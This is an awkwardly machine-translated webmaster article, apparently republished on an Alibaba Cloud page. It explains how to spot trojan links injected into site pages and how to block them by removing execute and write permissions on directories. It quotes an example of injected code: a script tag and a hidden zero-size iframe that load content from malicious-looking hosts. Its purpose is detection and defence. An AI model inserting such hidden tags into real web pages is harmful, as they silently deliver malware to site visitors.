Easy way to solve the problem of Web site program bug hanging Horse
Source: Internet
Author: User
Keywordsnbsp Hanging Horse website program
Believe that most webmasters have the site is hanging horse (is hanging virus) experience, especially with the Chinese Internet development of this batch of veteran webmaster, with the network popularization of the more in-depth, the more advanced hacker technology, the more exposed to the previous procedures loopholes. Now the new webmaster is more happy, the current popular website procedures have been mature, such as Shopex, Easy, http://www.aliyun.com/zixun/aggregation/11656.html ">discuz, are very good procedures." Everyone as long as the timely upgrade to update the patch is not a big problem.
But there are still customers to reflect the site opened the virus, I will explain the reasons for their patience and the treatment of the method, but found that we still lack of some website maintenance common sense. Here, I offer you some ideas.
First of all, open the Web page after the antivirus software alarm prompted a virus, up to 2 kinds of possible, your Web page was put into a virus link, one is the site of the server is the ARP virus, the equivalent of a horse to the machine, but this does not mean that the server was real intrusion, may be the computer room other machines in the ARP packet.
Then you visit the page such as index.asp hint virus, through FTP login, download this file to your local computer, right-click the page with Notepad open, view the bottom of the page, if found <script language=javascript src= Http://aaabbcc.net/awlove/fuckk/love.jsd></script><iframe src=http://xxx.8888.com/newdm/ddd.htm Width=0 height=0></iframe> and other similar statements, it means that your site has been hacked, this is the virus code hanging. Delete after the save also removed the virus link, but can only cure root not cure. The intruder will still be able to keep you in. So what to do, and for what reason.
In fact, although there are so many good procedures, but there are still 2 kinds of situations, one is still using a few years ago, but not to find the network company produced, but a few years ago on the Internet, most of these procedures are flawed, especially the injection of loopholes in the previous few years, the code when the program is completely without a sense of prevention , but the site has been running for so long, there are a large number of important data, the site can not be said to replace the replacement, this mostly happened in the enterprise to do the corporate web site; the other is that the program patch update is not a long-term upgrade, hacker technology in progress, new loopholes will be found, So if the program service provider release patches to update or upgrade to the latest procedures, the other is not timely update may be hackers to use and hang the horse, but will inevitably appear can not be updated in time, and so very passive, the discovery of the loophole is always appear in the patch before.
So now we're going to use a simple way to solve these annoying viruses. Here we use the authority mechanism on the server to deal with, the server authority is the Web site program security of the last line of defense, but also the most effective, set a good once and for all. Set up the idea is to provide the upload of the directory to perform the right to remove, such as Access database directory data and Uploadface, uploadfiles, such as upload files stored directory; the directory to upload and file write permission to remove, such as index.asp, index.php such as Web files and Admin, Inc., include, and so do not need to upload files directory.
So even if the Trojan is uploaded, can not be executed, even if there is control permissions, but did not write the Web page to the virus link code permissions. Seemingly simple setting, in fact endless. The use of related directories and files is explained in the package that you download. As long as we understand the charm of authority and the flexibility to master the setting method, the site security becomes simple. In the VPS or server build station can also use the same reason, let the authority for your site to build the most solid protection network.
The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion;
products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the
content of the page makes you feel confusing, please write us an email, we will handle the problem
within 5 days after receiving your email.
If you find any instances of plagiarism from the community, please send an email to:
info-contact@alibabacloud.com
and provide relevant evidence. A staff member will contact you within 5 working days.